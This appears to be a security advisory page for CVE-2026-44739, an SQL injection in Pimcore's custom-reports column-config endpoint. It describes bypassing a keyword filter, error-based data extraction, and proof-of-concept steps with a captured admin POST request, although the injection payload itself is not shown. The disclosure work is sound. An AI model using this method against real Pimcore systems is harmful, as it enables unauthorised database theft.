CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

CVE-2026-44739

highCVSS 8.7covered by 1 sourcefirst seen 2026-05-27
Summary The columnConfigAction endpoint in the CustomReportsBundle is vulnerable to SQL injection. An attacker with the reports_config permission can supply a malicious SQL configuration that is concatenated into a query and executed. Although the application attempts to filter certain DDL/DML keywords (like UPDATE, DELETE, DROP), it fails to prevent arbitrary SELECT queries, UNION statements, or the use of dangerous database functions. Furthermore, because the application returns database error messages in the JSON response, an attacker can easily exfiltrate data using error-based SQL injection techniques. Affected scope bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php CustomReportController:columnConfigAction -> SqlAdapter::getColumns -> SqlAdapter::buildQueryString -> Db::fetchAssociative() PoC - Download and install the version Pimcore <=12.3.3 (latest) - Login using Admin account or any account that has reports_config permission - Navigate to custom reports - Capture the request using burp suite and perform SQLi attack as the following 1. Get Database username POST /admin/bundle/customreports/custom-report/column-config HTTP/1.1 Host: localhost Content-Length: 310 sec-ch-ua-platform: "Linux" Accept-Language: en-US,en;q=0.9 sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142" sec-ch-ua-mobile: ?0 X-pimcore-extjs-version-minor: 0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 X-pimcore-csrf-token: 2e42012c8310823bbdbce1598bdecfd19cb5e9c4 X-pimcore-extjs-version-major: 7 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/admin/ Accept-Encoding: gzip, deflate, br Cookie: pimcore_admin_auth_profile_token=9f990b; PHPSESSID=d101f6fce4d87b8bdbbe800f9f50c82a; _pc_vis=3a17250fba52c657; _pc_ses=177489

⚡ Watch CVE-2026-44739

Get an email if CVE-2026-44739 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.

Advisory coverage (1)

External references

NVD record for CVE-2026-44739

CVE.org record

Embed the live status

CVE-2026-44739 live status badge — this badge updates automatically when the KEV or exploit status changes. How to embed it →

[![CVE-2026-44739 status](https://www.csirts.com/badge/CVE-2026-44739)](https://www.csirts.com/cve/CVE-2026-44739)